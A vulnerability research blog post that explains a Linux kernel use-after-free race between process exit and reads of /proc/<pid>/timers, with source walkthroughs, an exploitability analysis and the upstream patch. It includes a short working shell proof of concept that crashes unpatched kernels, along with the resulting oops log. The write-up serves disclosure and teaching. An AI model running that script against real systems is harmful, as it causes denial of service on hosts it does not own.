Access Vector Access Vector

chris@accessvector.net

Racing Cats to the Exit: A Boring Linux Kernel Use-After-Free

chris

Introduction

Kernel code that tears down processes when they exit can be interesting to audit from a vulnerability research point of view: by virtue of the process exiting, there are lots of resources that are up for the chop. It's not always obvious that some of those resources may still be accessible to other processes.

In this small article, I'll explore a fairly dull use-after-free in the Linux kernel that's been around in the process termination code for quite a number of years. It occurs exactly for this reason. The vulnerability is only dull because there doesn't appear to be any way to usefully exploit it beyond causing a DoS.

PoC
Proof-of-concept running on Debian 11.3.0.

The vulnerable part of the exit path has actually been there since 2005, but was only made a problem in 2013 with the introduction of /proc/<pid>/timers.

Either way, it affects a wide range of distributions over a long period of time, so that's something.

Vulnerability Details

The do_exit function is responsible for orchestrating the death of a process from the kernel's view of things. It's the last thing to run before a process is completely destroyed:

    void __noreturn do_exit(long code)
    {
        struct task_struct *tsk = current;
        int group_dead;
    ...
        group_dead = atomic_dec_and_test(&tsk->signal->live);
[1]     if (group_dead) {
    ...
    #ifdef CONFIG_POSIX_TIMERS
            hrtimer_cancel(&tsk->signal->real_timer);
[2]         exit_itimers(tsk->signal);
    #endif

There is no distinction between "threads" and "tasks" in Linux: a thread is just a task that happens to share a bunch of resources with some other tasks (memory maps, file descriptor tables, etc.). What we logically think of as a process is a "task group" inside the kernel.

When the last task in a group has exited, group_dead is true and we pick this up at [1]. Part of the logic then is to clear out any pending timers [2].

    /*
     * This is called by do_exit or de_thread, only when there are no more
     * references to the shared signal_struct.
     */
    void exit_itimers(struct signal_struct *sig)
    {
        struct k_itimer *tmr;
    
[3]     while (!list_empty(&sig->posix_timers)) {
[4]         tmr = list_entry(sig->posix_timers.next, struct k_itimer, list);
[5]         itimer_delete(tmr);
        }
    }

This is very simple: while there are still entries on the posix_timers list [3], we get a pointer to one [4] and delete it [5].

Notice that there are no locks being held here, but that seems entirely reasonable: we've got to this function because the last task in a task group has exited, so there should be no live references to the list.

A quick rg -w posix_timers shows this isn't necessarily true:

    % rg -w posix_timers
    kernel/time/posix-timers.c
    562:    list_add(&new_timer->list, &current->signal->posix_timers);
    1061:   while (!list_empty(&sig->posix_timers)) {
    1062:           tmr = list_entry(sig->posix_timers.next, struct k_itimer, list);
    
    kernel/fork.c
    1710:   INIT_LIST_HEAD(&sig->posix_timers);
    
    fs/proc/base.c
    2433:   return seq_list_start(&tp->task->signal->posix_timers, *pos);
    2439:   return seq_list_next(v, &tp->task->signal->posix_timers, pos);
    ...

It looks like there's something in procfs that could expose posix_timers to another process. Let's take a closer look.

The functions that ripgrep has drawn us to are timers_start and timers_next. These functions form part of the seq_file implementation for /proc/<pid>/timers, which is a procfs entry for exposing information about POSIX timers registered by a process.

seq_file is a really useful abstraction provided by procfs for implementing entries that represent a list or sequence. Providing information about a list of timers owned by a process would be a perfect example of how it's useful.

To implement a seq_file, part of the kernel needs to provide some function implementations and register itself with procfs. Then when userland reads from it, the Linux kernel basically does:

  1. Call the ->start implementation, calling the ->show implementation on the return value.
  2. Continuously call the ->next implementation, calling ->show on each return value until the total amount of data requested has been produced.
  3. Call the ->stop implementation.

When the seq_file implementation is opened, some context data is stashed on the file itself inside file->private. This pointer is accessible inside the ->start, ->next and ->stop implementations and used to know what information to return.

For the /proc/<pid>/timers implementation, file->private points to a struct timers_private:

     struct timers_private {
         struct pid *pid;
         struct task_struct *task;
         struct sighand_struct *sighand;
         struct pid_namespace *ns;
         unsigned long flags;
     };

This provides the functions with all the information they need to provide a list of posix_timers to userland when the file is read.

Let's take a walk through the code here to understand how it works:

     static void *timers_start(struct seq_file *m, loff_t *pos)
     {
[6]      struct timers_private *tp = m->private;
     
[7]      tp->task = get_pid_task(tp->pid, PIDTYPE_PID);
         if (!tp->task)
             return ERR_PTR(-ESRCH);
     
[8]      tp->sighand = lock_task_sighand(tp->task, &tp->flags);
         if (!tp->sighand)
             return ERR_PTR(-ESRCH);
     
[9]      return seq_list_start(&tp->task->signal->posix_timers, *pos);
     }

Beginning with the timers_start implementation here, we see the opaque pointer cast to the right type [6] and the task resolved using the stashed pid [7]. The kernel stashes a pid rather than a task reference here because otherwise a task wouldn't be able to properly exit until all open /proc/<pid>/timers files were closed. It's a bit like holding a weak reference instead of a strong one.

With the task resolved, the kernel then calls lock_task_sighand to get access to the sighand pointer [8]. This is immediately interesting because it tells us that accessing sighand must be done with that lock held. With that held, it's then safe to use the seq_list_start helper function to fetch the right element (at position pos) from the posix_timers list [9].

Continuing onto the next implementation:

     static void *timers_next(struct seq_file *m, void *v, loff_t *pos)
     {
         struct timers_private *tp = m->private;
[10]     return seq_list_next(v, &tp->task->signal->posix_timers, pos);
     }

Nice and simple. The kernel is still holding the sighand lock at this point, so the function is little more than a call to the seq_list_next helper [10]. That function fetches the right element from the list and advances the pos index.

Once the kernel is done fetching data from the seq_file, the stop implementation is called:

    static void timers_stop(struct seq_file *m, void *v)
    {
        struct timers_private *tp = m->private;
    
        if (tp->sighand) {
[11]        unlock_task_sighand(tp->task, &tp->flags);
            tp->sighand = NULL;
        }
    
        if (tp->task) {
[12]        put_task_struct(tp->task);
            tp->task = NULL;
        }
    }

Now the opposite of timers_start is performed: the sighand lock is released [11] and the reference on the task dropped [12].

For completion, let's see what happens to show a timer:

    static int show_timer(struct seq_file *m, void *v)
    {
        struct k_itimer *timer;
        struct timers_private *tp = m->private;
        int notify;
        static const char * const nstr[] = {
            [SIGEV_SIGNAL] = "signal",
            [SIGEV_NONE] = "none",
            [SIGEV_THREAD] = "thread",
        };
    
[13]    timer = list_entry((struct list_head *)v, struct k_itimer, list);
        notify = timer->it_sigev_notify;
    
        seq_printf(m, "ID: %d\n", timer->it_id);
        seq_printf(m, "signal: %d/%px\n",
               timer->sigq->info.si_signo,
               timer->sigq->info.si_value.sival_ptr);
        seq_printf(m, "notify: %s/%s.%d\n",
               nstr[notify & ~SIGEV_THREAD_ID],
               (notify & SIGEV_THREAD_ID) ? "tid" : "pid",
               pid_nr_ns(timer->it_pid, tp->ns));
        seq_printf(m, "ClockID: %d\n", timer->it_clock);
    
        return 0;
    }

Coming into this function, v is the raw return value from the start or next implementations. In this case, the value is cast to the k_itimer pulled out of the posix_timers list [13] and various bits of information formatted from it.

There are some key pieces of information here:

  1. The pid is resolved into a task on the fly to avoid holding a task reference.
  2. The sighand is locked before iterating over posix_timers.

By racing this logic with do_exit, the assumption used there as the basis for not holding the sighand lock is violated. It seemed safe to just traverse it without the sighand lock because the process was exiting — so there should be no live references by definition. But it turns out that resolving the task through get_pid_task gives us external access at the critical point. We can race the loop in exit_itimers [3] with a read from /proc/<pid>/timers, causing a use-after-free in show_timer as it's concurrently cleaned away.

We don't actually need anything more than a little shell script to try this out:

#!/bin/sh
while :; do
        timeout 0.01 sleep 1 &
        TARGET=$!
        while cat /proc/$TARGET/timers >/dev/null 2>&1; do :; done
done

That will continuously try to read the timers of a background timeout process. /usr/bin/timeout uses POSIX timers to implement its timeout logic, so it's an ideal victim.

Testing this out, we can see that we do indeed cause a kernel oops:

# tail -f /var/log/messages
Jul  4 21:27:19 debian kernel: [    2.343912] usb 1-4.1: SerialNumber: 1-0000:00:03.0-4.1
Jul  4 21:27:19 debian kernel: [    2.359373] SCSI subsystem initialized
Jul  4 21:27:19 debian kernel: [    2.363885] usb-storage 1-4.1:1.0: USB Mass Storage device detected
Jul  4 21:27:19 debian kernel: [    2.364537] scsi host0: usb-storage 1-4.1:1.0
Jul  4 21:27:19 debian kernel: [    2.364693] usbcore: registered new interface driver usb-storage
Jul  4 21:27:19 debian kernel: [    2.366976] usbcore: registered new interface driver uas
Jul  4 21:27:20 debian kernel: [    3.374506] scsi 0:0:0:0: CD-ROM            QEMU     QEMU CD-ROM      2.5+ PQ: 0 ANSI: 5
Jul  4 21:27:20 debian kernel: [    3.382554] scsi 0:0:0:0: Attached scsi generic sg0 type 5
Jul  4 21:27:20 debian kernel: [    3.390060] sr 0:0:0:0: [sr0] scsi3-mmc drive: 16x/50x cd/rw xa/form2 cdda tray
Jul  4 21:27:20 debian kernel: [    3.390063] cdrom: Uniform CD-ROM driver Revision: 3.20

Message from syslogd@debian at Jul  4 21:28:44 ...
 kernel:[   84.013346] Internal error: Oops: 96000004 [#1] SMP

Message from syslogd@debian at Jul  4 21:28:44 ...
 kernel:[   84.018666] Code: aa0003f4 a9025bf5 90005301 91300021 (b9403662)
Jul  4 21:28:44 debian kernel: [   84.013445] Modules linked in: sr_mod cdrom sg uas usb_storage scsi_mod joydev hid_generic usbhid hid aes_ce_blk crypto_simd snd_hda_codec_generic cryptd ledtrig_audio aes_ce_cipher ghash_ce gf128mul libaes snd_hda_intel snd_intel_dspcfg sha3_ce snd_hda_codec sha3_generic sha512_ce snd_hda_core nls_ascii sha512_arm64 snd_hwdep nls_cp437 sha2_ce snd_pcm virtio_gpu vfat virtio_dma_buf fat snd_timer snd sha256_arm64 virtio_console soundcore drm_kms_helper sha1_ce evdev efi_pstore qemu_fw_cfg drm fuse configfs efivarfs virtio_rng rng_core ip_tables x_tables autofs4 ext4 crc16 mbcache jbd2 crc32c_generic xhci_pci virtio_net net_failover virtio_blk failover xhci_hcd crct10dif_ce crct10dif_common usbcore virtio_pci usb_common virtio_mmio virtio_ring virtio
Jul  4 21:28:44 debian kernel: [   84.014760] CPU: 2 PID: 117611 Comm: cat Not tainted 5.10.0-15-arm64 #1 Debian 5.10.120-1
Jul  4 21:28:44 debian kernel: [   84.014920] Hardware name: QEMU QEMU Virtual Machine, BIOS 0.0.0 02/06/2015
Jul  4 21:28:44 debian kernel: [   84.015059] pstate: 80400085 (Nzcv daIf +PAN -UAO -TCO BTYPE=--)
Jul  4 21:28:44 debian kernel: [   84.015191] pc : show_timer+0x30/0xe0
Jul  4 21:28:44 debian kernel: [   84.015267] lr : seq_read_iter+0x3d4/0x4e0
Jul  4 21:28:44 debian kernel: [   84.015349] sp : ffff80001231bc80
Jul  4 21:28:44 debian kernel: [   84.015414] x29: ffff80001231bc80 x28: 0000000000000000
Jul  4 21:28:44 debian kernel: [   84.015519] x27: ffffd9624b9f2bf0 x26: 0000000000000000
Jul  4 21:28:44 debian kernel: [   84.015624] x25: ffff100806e2b560 x24: ffff100806e2b550
Jul  4 21:28:44 debian kernel: [   84.015728] x23: 0000000000000000 x22: ffff80001231bd50
Jul  4 21:28:44 debian kernel: [   84.015833] x21: ffff80001231bd78 x20: ffff100806e2b528
Jul  4 21:28:44 debian kernel: [   84.015938] x19: dead000000000100 x18: 00000000fffffffe
Jul  4 21:28:44 debian kernel: [   84.016042] x17: 0000000000000000 x16: 0000000000000000
Jul  4 21:28:44 debian kernel: [   84.016147] x15: 0000000000000020 x14: ffffffffffffffff
Jul  4 21:28:44 debian kernel: [   84.016252] x13: ffff1008033de000 x12: ffff1008033dd045
Jul  4 21:28:44 debian kernel: [   84.016399] x11: 0000000000000000 x10: 0000000000000000
Jul  4 21:28:44 debian kernel: [   84.016556] x9 : ffffd9624b1ae694 x8 : ffff1008033dd000
Jul  4 21:28:44 debian kernel: [   84.016713] x7 : ffff80001231bc80 x6 : ffffd9624b241680
Jul  4 21:28:44 debian kernel: [   84.016870] x5 : 0000000000000001 x4 : 0000000000000047
Jul  4 21:28:44 debian kernel: [   84.017027] x3 : 0000000000000001 x2 : ffffd9624b2415a0
Jul  4 21:28:44 debian kernel: [   84.017253] x1 : ffffd9624bca1c00 x0 : ffff100806e2b528
Jul  4 21:28:44 debian kernel: [   84.017412] Call trace:
Jul  4 21:28:44 debian kernel: [   84.017486]  show_timer+0x30/0xe0
Jul  4 21:28:44 debian kernel: [   84.017585]  seq_read_iter+0x3d4/0x4e0
Jul  4 21:28:44 debian kernel: [   84.017696]  seq_read+0xe8/0x140
Jul  4 21:28:44 debian kernel: [   84.017793]  vfs_read+0xb8/0x1e4
Jul  4 21:28:44 debian kernel: [   84.017889]  ksys_read+0x74/0x100
Jul  4 21:28:44 debian kernel: [   84.017988]  __arm64_sys_read+0x28/0x3c
Jul  4 21:28:44 debian kernel: [   84.018106]  el0_svc_common.constprop.0+0x80/0x1d0
Jul  4 21:28:44 debian kernel: [   84.018248]  do_el0_svc+0x30/0xa0
Jul  4 21:28:44 debian kernel: [   84.018356]  el0_svc+0x20/0x30
Jul  4 21:28:44 debian kernel: [   84.018447]  el0_sync_handler+0x1a4/0x1b0
Jul  4 21:28:44 debian kernel: [   84.018567]  el0_sync+0x180/0x1c0
Jul  4 21:28:44 debian kernel: [   84.018847] ---[ end trace 1537965dd187a7f3 ]---

The "oops" indicates that a kernel segmentation fault has occurred and the backtrace shows that it's where we expected it to be: inside show_timer.

Here it is in action:

To understand whether we can do anything useful with this bug, we need to:

  1. Analyse what happens in itimer_delete to see what's being freed and how.
  2. Inspect what show_timer is doing with the freed data that may be interesting to control.

For a use-after-free to be exploitable, we need to be able to control the reallocation of the hole and place data there that can be used to our advantage.

Exploitability Analysis

Let's begin by dissecting itimer_delete:

    static void itimer_delete(struct k_itimer *timer)
    {
    retry_delete:
        spin_lock_irq(&timer->it_lock);
    
        if (timer_delete_hook(timer) == TIMER_RETRY) {
            spin_unlock_irq(&timer->it_lock);
            goto retry_delete;
        }
[1]     list_del(&timer->list);
    
        spin_unlock_irq(&timer->it_lock);
[2]     release_posix_timer(timer, IT_ID_SET);
    }

Aside from servicing any registered callback, the code here deletes the timer from the list [1] (that's posix_timers in our case) and then calls release_posix_timer [2].

    #define IT_ID_SET   1
    #define IT_ID_NOT_SET   0
    static void release_posix_timer(struct k_itimer *tmr, int it_id_set)
    {
        if (it_id_set) {
            unsigned long flags;
            spin_lock_irqsave(&hash_lock, flags);
[3]         hlist_del_rcu(&tmr->t_hash);
            spin_unlock_irqrestore(&hash_lock, flags);
        }
[4]     put_pid(tmr->it_pid);
[5]     sigqueue_free(tmr->sigq);
[6]     call_rcu(&tmr->rcu, k_itimer_rcu_free);
    }

Note that at [2] we call release_posix_timer with IT_ID_SET, which means the code will call hlist_del_rcu at [3]. This is because the timer is linked to from two places: firstly in the posix_timers list, which we know, but also in a global hash table.

Our VR senses should be tingling right now: since the timer is on more than one list, perhaps that's another vector to reaching it while it's being destroyed? It turns out that's a dead-end. There are only two places where that global hash table is accessed (search for t_hash in cscope):

    static struct k_itimer *__posix_timers_find(struct hlist_head *head,
                            struct signal_struct *sig,
                            timer_t id)
    {
        struct k_itimer *timer;
    
        hlist_for_each_entry_rcu(timer, head, t_hash,
                     lockdep_is_held(&hash_lock)) {
            if ((timer->it_signal == sig) && (timer->it_id == id))
                return timer;
        }
        return NULL;
    }
    
    static struct k_itimer *posix_timer_by_id(timer_t id)
    {
[7]     struct signal_struct *sig = current->signal;
        struct hlist_head *head = &posix_timers_hashtable[hash(sig, id)];
    
        return __posix_timers_find(head, sig, id);
    }
    
    static int posix_timer_add(struct k_itimer *timer)
    {
[8]     struct signal_struct *sig = current->signal;
        int first_free_id = sig->posix_timer_id;
        struct hlist_head *head;
        int ret = -ENOENT;
    
        do {
            spin_lock(&hash_lock);
            head = &posix_timers_hashtable[hash(sig, sig->posix_timer_id)];
            if (!__posix_timers_find(head, sig, sig->posix_timer_id)) {
                hlist_add_head_rcu(&timer->t_hash, head);
                ret = sig->posix_timer_id;
            }
            if (++sig->posix_timer_id < 0)
                sig->posix_timer_id = 0;
            if ((sig->posix_timer_id == first_free_id) && (ret == -ENOENT))
                /* Loop over all possible ids completed */
                ret = -EAGAIN;
            spin_unlock(&hash_lock);
        } while (ret == -ENOENT);
        return ret;
    }

Both of these routes use current->signal [7], [8], which means we can only pull out a reference to timers that our process owns. Since we'd be racing with do_exit to reach a use-after-free here, we know it's not possible to have either of those functions called concurrently. Code execution for current would have stopped at the point of do_exit running.

It was worth exploring though.

Returning to release_posix_timer, we observe that there are a few fields that look like they could end up being freed: ->it_pid, ->sigq and, of course, the timer itself.

Before we concern ourselves with how they're freed and what data we might be able to place at their addresses, we should step back and go to the use-after-free site. We need to understand how those fields are actually used and see if there would be anything useful we could do even if we assumed 100% stable control of the reallocations.

There are three functions to consider that are tainted by the concurrent free:

  1. seq_list_start: used to fetch the first entry from posix_timers.
  2. seq_list_next: used to fetch the next entry from posix_timers.
  3. show_timer: used to write information about a timer into a buffer.

seq_list_start and seq_list_next are fairly simple to understand: they just walk the linked list until they reach the right timer. Freeing the timer concurrently to those functions could influence the list-walking code, but that doesn't seem very useful. At best, it means we could fully control the timer pointer passed to show_timer, which is worth bearing in mind.

show_timer does a few things:

     static int show_timer(struct seq_file *m, void *v)
     {
         struct k_itimer *timer;
         struct timers_private *tp = m->private;
         int notify;
         static const char * const nstr[] = {
             [SIGEV_SIGNAL] = "signal",
             [SIGEV_NONE] = "none",
             [SIGEV_THREAD] = "thread",
         };
     
         timer = list_entry((struct list_head *)v, struct k_itimer, list);
[9]      notify = timer->it_sigev_notify;
     
[10]     seq_printf(m, "ID: %d\n", timer->it_id);
[11]     seq_printf(m, "signal: %d/%px\n",
                timer->sigq->info.si_signo,
                timer->sigq->info.si_value.sival_ptr);
[12]     seq_printf(m, "notify: %s/%s.%d\n",
                nstr[notify & ~SIGEV_THREAD_ID],
                (notify & SIGEV_THREAD_ID) ? "tid" : "pid",
[13]            pid_nr_ns(timer->it_pid, tp->ns));
[14]     seq_printf(m, "ClockID: %d\n", timer->it_clock);
     
         return 0;
     }

We can see that all of the critical lines here basically just read primitive values from the potentially-freed data structures ([9], [10], [11], [12], [13] and [14]).

The only one I see here that's vaguely interesting (at a stretch) is notify [9], since that's used to index into a static const char *[]. With extreme effort and a favourable wind, maybe we'd be able to disclose a kernel pointer with that? It's barely worth pursuing if that's our best case scenario.

It's tempting to say that we could replace the data pointed to by any of the timer, it_pid or sigq pointers with a different structure, thereby creating an information disclosure. Inspecting how these structures are allocated and freed shows that they all come from specialised kmemcaches though — so placing a heterogeneous type at the same virtual address (key to having a good amount of control over the fields) in a stable way is going to be very difficult. Even so, all we'd end up with is a lousy kernel pointer.

Sadly, from an exploitation point of view, that seems to be that. It looks like all we can really do is cause some bad pointers to be dereferenced, causing a kernel oops.

Patch

The fix works by taking the sighand lock inside exit_itimers and moving the list to a temporary local list before freeing the items. This is to avoid attempting to free while holding a spin lock:

diff --git a/fs/exec.c b/fs/exec.c
index 0989fb8472a1..778123259e42 100644
--- a/fs/exec.c
+++ b/fs/exec.c
@@ -1301,7 +1301,7 @@ int begin_new_exec(struct linux_binprm * bprm)
        bprm->mm = NULL;
 
 #ifdef CONFIG_POSIX_TIMERS
-       exit_itimers(me->signal);
+       exit_itimers(me);
        flush_itimer_signals();
 #endif
 
diff --git a/include/linux/sched/task.h b/include/linux/sched/task.h
index 505aaf9fe477..81cab4b01edc 100644
--- a/include/linux/sched/task.h
+++ b/include/linux/sched/task.h
@@ -85,7 +85,7 @@ static inline void exit_thread(struct task_struct *tsk)
 extern __noreturn void do_group_exit(int);
 
 extern void exit_files(struct task_struct *);
-extern void exit_itimers(struct signal_struct *);
+extern void exit_itimers(struct task_struct *);
 
 extern pid_t kernel_clone(struct kernel_clone_args *kargs);
 struct task_struct *create_io_thread(int (*fn)(void *), void *arg, int node);
diff --git a/kernel/exit.c b/kernel/exit.c
index f072959fcab7..64c938ce36fe 100644
--- a/kernel/exit.c
+++ b/kernel/exit.c
@@ -766,7 +766,7 @@ void __noreturn do_exit(long code)
 
 #ifdef CONFIG_POSIX_TIMERS
                hrtimer_cancel(&tsk->signal->real_timer);
-               exit_itimers(tsk->signal);
+               exit_itimers(tsk);
 #endif
                if (tsk->mm)
                        setmax_mm_hiwater_rss(&tsk->signal->maxrss, tsk->mm);
diff --git a/kernel/time/posix-timers.c b/kernel/time/posix-timers.c
index 1cd10b102c51..5dead89308b7 100644
--- a/kernel/time/posix-timers.c
+++ b/kernel/time/posix-timers.c
@@ -1051,15 +1051,24 @@ static void itimer_delete(struct k_itimer *timer)
 }
 
 /*
- * This is called by do_exit or de_thread, only when there are no more
- * references to the shared signal_struct.
+ * This is called by do_exit or de_thread, only when nobody else can
+ * modify the signal->posix_timers list. Yet we need sighand->siglock
+ * to prevent the race with /proc/pid/timers.
  */
-void exit_itimers(struct signal_struct *sig)
+void exit_itimers(struct task_struct *tsk)
 {
+       struct list_head timers;
        struct k_itimer *tmr;
 
-       while (!list_empty(&sig->posix_timers)) {
-               tmr = list_entry(sig->posix_timers.next, struct k_itimer, list);
+       if (list_empty(&tsk->signal->posix_timers))
+               return;
+
+       spin_lock_irq(&tsk->sighand->siglock);
+       list_replace_init(&tsk->signal->posix_timers, &timers);
+       spin_unlock_irq(&tsk->sighand->siglock);
+
+       while (!list_empty(&timers)) {
+               tmr = list_first_entry(&timers, struct k_itimer, list);
                itimer_delete(tmr);
        }
 }

Conclusion

Not all use-after-frees work out for something interesting. A lot of them do and it's a bit of a shame this one didn't given the prevalence of the code since it would have made for an interesting investigation.

A lesson we can take away from here is that cross-process inspection tools — be they kernel syscalls or filesystem abstractions or anything else — are interesting ways to create unexpected paths to data that should be inaccessible. All it takes is for one obscure path to be exposed and a lot of code that would otherwise be sound is suddenly an interesting toy for an attacker to play with.